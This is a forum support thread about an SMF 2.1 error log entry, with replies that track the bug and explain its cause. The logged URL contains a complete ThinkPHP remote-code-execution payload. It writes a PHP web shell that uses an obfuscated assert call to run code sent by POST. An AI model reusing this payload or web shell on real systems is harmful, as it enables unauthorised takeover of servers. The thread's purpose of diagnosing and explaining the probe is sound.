Simple Machines Community Forum

SMF Support => SMF 2.1.x Support => Topic started by: dsanchez on May 05, 2019, 12:17:04 PM

Title: 2: strlen() expects parameter 1 to be string, array given
Post by: dsanchez on May 05, 2019, 12:17:04 PM
Error:

Code: [Select]
Type of error: General
Error message: 2: strlen() expects parameter 1 to be string, array given
File: /var/www/html/Sources/Logging.php
Line: 33
URL of page causing the error: http://curefans.com/index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars%5B0%5D=file_put_contents&vars%5B1%5D%5B%5D=ulpza.php&vars%5B1%5D%5B%5D=%3C?php%20print(md5(222));$a=str_replace(%22vbnm%22,%22%22,%22asvbnmsert%22);@$a($_POST%5Bysy%5D);?%3Eysydjsjxbei37$

Backtrace:

Code: [Select]
#0: smf_error_handler()
Called from /var/www/html/Sources/Logging.php on line 33
#1: truncateArray()
Called from /var/www/html/Sources/Logging.php on line 88
#2: writeLog()
Called from /var/www/html/index.php on line 244
#3: smf_main()
Called from /var/www/html/index.php on line 151
Title: Re: 2: strlen() expects parameter 1 to be string, array given
Post by: Suki on May 05, 2019, 12:35:22 PM
Thank you, tracked at https://github.com/SimpleMachines/SMF2.1/issues/5653
Title: Re: 2: strlen() expects parameter 1 to be string, array given
Post by: Arantor on May 05, 2019, 01:00:21 PM
This is also a case of something trying to find a vulnerability in a different piece of software - https://securitynews.sonicwall.com/xmlpost/thinkphp-remote-code-execution-rce-bug-is-actively-being-exploited/ so the only bug here is that it's causing an error to be logged rather than a core SMF bug.